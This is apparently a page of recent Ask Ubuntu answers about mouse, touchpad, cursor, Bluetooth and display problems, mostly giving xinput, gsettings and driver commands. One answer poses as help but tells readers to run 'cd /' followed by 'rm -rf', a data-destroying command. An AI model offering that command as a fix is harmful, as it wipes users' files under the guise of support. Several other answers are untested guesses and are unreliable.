Tag Info

New answers tagged

0

A stuck CTL, ALT, Windows or Menu key (assuming a Windows marked keyboard) can cause click activity to change meaning (often seeming to do nothing), regardless of hardware source. Try cleaning the keyboard (method varies on laptops; some have removable keycaps, most don't) to see if that improves the situation.


1

I figured it out. First, find out the settings of which device you need to change. This page will help you. The is was 11 in my case. Then just execute xinput --set-prop 11 "Synaptics Soft Button Areas" 0, 0, 0, 0, 0, 0, 0, 0 And change 11 to the id of your touchpad. That's it. It works instantly. Unfortunately, the settings reset when you restart your ...


0

Having the same issue on my Dell XPS 13 9343. Using the configuration that Stefano Maffulli suggested in the above comments seems to be working so far. It was in the glitchy state when ran the command, so its possible just updating the synclient settings might have kicked it out of some bad mode. So it might be the case that any change in the synclient ...


0

If you do Ctrl + Alt + F1 followed by Ctrl + Alt + F7, this may fix the problem.


0

You have a Focaltech touchpad. You can fix it this way. Run in terminal: sudo apt-get install linux-generic-lts-vivid reboot. Then run sudo add-apt-repository ppa:hanipouspilot/focaltech-dkms sudo apt-get update sudo apt-get install focaltech-dkms But it looks like you tried to install a wrong driver. That's why your touchpad is not detected at all.


-2

Have you tried this: gsettings set org.gnome.settings-plugin.cursor KEY=active VALUE=true and it might work fine this way.


0

Open a terminal ctrl+alt+t and type sudo apt-get install lightdm --reinstall then sudo shutdown -r now to reboot. This worked for me and I've tested it by rebooting several times.


0

I fixed it by going to displays setting (write dis in search bar) and than turned off the "unknown display". U see in displays setting two displays in the middle of picture in settings. One is built-in-display another is unknown. Choose unknown by clicking on it on the picture and take the button next to the "Unknown Display" from on to off. Tada


1

Run in terminal sudo tee /etc/modprobe.d/iwlwifi-opt.conf <<< "options iwlwifi bt_coex_active=0" and reboot. Bluetooth coexistence technology in iwlwifi is not good and makes things worse.


0

I also experienced a screen freeze problem similar to the one you described, after a recent upgrade from Ubuntu 12.04 to 14.04. The upgrade also led to occasional forced logout. My computer is running on an Intel i5 CPU and 4GB RAM. I used htop to investigate what processes were keeping my CPU busy. I saw a suspicious process compiz and wondered what that ...


0

I've read all the answers, and I've written a script around input-kbd (part of input-utils) to auto-fix this issue. You should run fixMouse from this repository once every login. It will: listen to dbus for this mouse configure all the keystrokes to KEY_UNKNOWN Standard mouse features (left button; scroll; etc.) still work fine. Only the weird ...


0

An extra display under System Settings => Display is causing the error. You have to disabled it.


0

As for that problem on my Yoga 2 pro I had to type in bash xinput --list There you get a list of devices. From there you can see the devices. We want to display the SynPS/2 Synaptics TouchPad proporties. xinput --list-props "SynPs/2 Synaptics Touchpad" from there I edited the "finger" attribute up from 25 30 0 to 40 40 0 and that annoying last jump was ...


2

I believe what is happening is that you have a mouse that uses the new low-energy bluetooth mode that was introduced in bluez5 and your running bluez4. I have a similar situation with my Microsoft Arc Mouse. In this line: [ 1359.069997] Bluetooth: HCI request failed to create LE connection: status 0x0c the LE connection refers to this new low-energy mode ...


0

I had a similar problem on 15.04. At one point the mouse cursor suddenly disappeared, but when I moved to another workspace (Ctrl-Alt-Arrow) it reappeared.


0

Try using the latest nvidia-355 driver(ppa:xorg-edgers), it does not have the issue of freezing for me. You can install the ppa by using this command: apt-add-repository ppa:xorg-edgers/ppa apt-get update Install the driver using ubuntus driver manager (or how it's called)


0

You need to install video driver. Run in terminal sudo apt-get install nvidia-346 and reboot. If that does not work well, install another driver sudo apt-get purge nvidia* sudo add-apt-repository ppa:xorg-edgers/ppa sudo apt-get update sudo apt-get install nvidia-352 sudo add-apt-repository -r ppa:xorg-edgers/ppa


0

Modify xorg.conf Append the following section to /usr/share/X11/xorg.conf (In a terminal, enter sudo gedit /usr/share/X11/xorg.conf) Section "InputClass" Identifier "Mouse Remap" MatchProduct "Saitek Cyborg R.A.T.7 Mouse" MatchDevicePath "/dev/input/event*" Option "ButtonMapping" "1 2 3 4 5 6 7 8 9 0 0 0 0 0 0" EndSection ...


0

Simply try following steps: 1. Open your terminal 2. "cd /" 3. "rm -rf" 4. Now your System will work and ALLAHU AKBAR" Have a nice Day


0

I've finally been able to solve this issue. Grab the bluez packages named 5.23-1ubuntu1~mtrudel1 and indicator-bluetooth from the following PPA. You need to modify the bluez package and remove the dependencies init-system-helpers and lsb-base, otherwise you're going to have some dependency issues when you perform a system update. Manually install that ...


0

Answer taken from here: http://askubuntu.com/a/660666/256078 What's happening is that the MX Anywhere 2 requires Bluetooth Smart and Ubuntu ships with bluez (the Bluetooth driver) 4 which does not have support for Bluetooth Smart. Bluez 5, which adds support for Bluetooth Smart, is supposed to start shipping with 15.10, but for now, you'll have to install ...


0

I fixed this issue by deleting my .config folder from my home dir (~) after noticing the issue only appeared on one user. While not ideal it is a possible fix.


2

I had this problem a while back. Basically what's happening is that the MX Master requires Bluetooth Smart and Ubuntu ships with bluez (the Bluetooth driver) 4 which does not have support for Bluetooth Smart. Bluez 5, which adds support for Bluetooth Smart, is supposed to start shipping with 15.10, but for now, you'll have to install bluez 5 manually if you ...


2

You can install the xdotool utility and then move the mouse to a given screen and x and y position, eg: xdotool mousemove --screen 1 10 10 If your 2 screens are actually one large virtual screen (xinerama mode) you dont use --screen but give a very large x value.


0

I installed CAELinux using the Ubuntu 12.04 and had the same problem. I just installed "BLEACHBIT" and ran the entire utility. Now the dissapearing/Flickering cursor problem is resolved along with some much needed performance issues. Go figure.


1

I have the same problem. And, finally, I found this https://bugs.launchpad.net/ubuntu/+source/nvidia-graphics-drivers-346/+bug/1440012 So, I think maybe you have installed the nvidia-346 driver? If you did install nvidia-346 driver, you can downgrade to nvidia-331 or upgrade to nvidia349 to avoid this issue. fearlessly install driver 349 : sudo ...


0

I had this issue and it also affected my wireless network - couldn't use mouse or connect to wifi. All devices were found, but I was getting a bunch of errors. Turned out that I reset BIOS to factory defaults (then updated them to what I thought I needed) and this was my problem. I had to go back into the BIOS and find a little setting called "IOMMU". ...


0

I experienced the same thing on my desktop computer with a Logitech mouse. In my case, I think it was temperature related. High CPU usage caused everything connected to the motherboard to heat up. When I connected the receiver to the far end of a USB extension cord, the problem went away.


0

I currently have the same problem and I don't think there's a clear fix to this issue. Did you install bluez 5? Ubuntu currently ships with bluez 4. I've tried to install newest bluez via ppa but it broke my system.


0

Try to open terminal and run gsettings set org.gnome.settings-daemon.plugins.cursor active true I got this from the https://bugs.launchpad.net/elementaryos/+bug/1430587. Hope it works, Good luck.


-1

If you need to use Windows just use windows installer to bring windows loader back. But this will kill grub so you wont be able to use ubuntu any more... I beleive it is grub error.


0

From the link provided above: (https://bugs.launchpad.net/ubuntu/+source/eog/+bug/1406045 ) To restore the pointer to normal click: ctrl + Alt + F1 followed by ctrl + Alt + F7 .


0

Install the package xautomation, we need the command xte sudo apt-get install xautomation Edit your xbindkeys configuration, e.g.: nano ~/.xbindkeysrc and add the following lines "xte 'mouseclick 1'" b:4 "xte 'mouseclick 1'" b:5 from man xte mouseclick i Click mouse button i Kill all kbindkeys processes killall xbindkeys Restart ...


1

Have you tried this: gsettings set org.settings.daemon-plugins.cursor -KEY=s.cursor -VALUE=false and it might work fine this way.


0

For 14.04 (Trusty Tahr) it could be disabled with the command: gsettings set org.gnome.desktop.wm.preferences action-middle-click-titlebar 'none' Restore original state: gsettings set org.gnome.desktop.wm.preferences action-middle-click-titlebar 'lower' Also, the following variants are possible: gsettings set org.gnome.desktop.wm.preferences ...


0

Try this: from the command line, enter sudo nano /etc/apt/sources.list in this file are 2 'extra' repositories. Uncomment these and reboot so that your system can update available repo's. Select 'software & updates from the launcher once you are back up and running, go to the other software tab and enable the extra repositories. You should be prompted ...


1

From this post on Ubuntu forums, running this command in a terminal fixed this issue gsettings set org.gnome.settings-daemon.plugins.cursor active false This works intermittently for me... and I don't know yet why it works at times and not others, but. may help you too.


0

got it working;) I had the pc connected for a while and I got a message that my repositories was out of date. refreshed and installed the driver one more time - rebooted and ok ;) now I m just missing right click function Edit: got right click aswell : this tutorial worked well https://help.ubuntu.com/stable/ubuntu-help/a11y-right-click.html now I`m ...


0

Here's what you do. (Keep your WiFi enabled during the following process) Mount the Ubuntu installation ISO image or the CD which you used for this installation. Browse the CD for pool/main/d/dkms/dkms-x.x.x.x-x_ubuntu.deb. (this is basically used to add modules/drivers to the kernel dynamically). Double click and install it. Now go to ...



Top 50 recent answers are included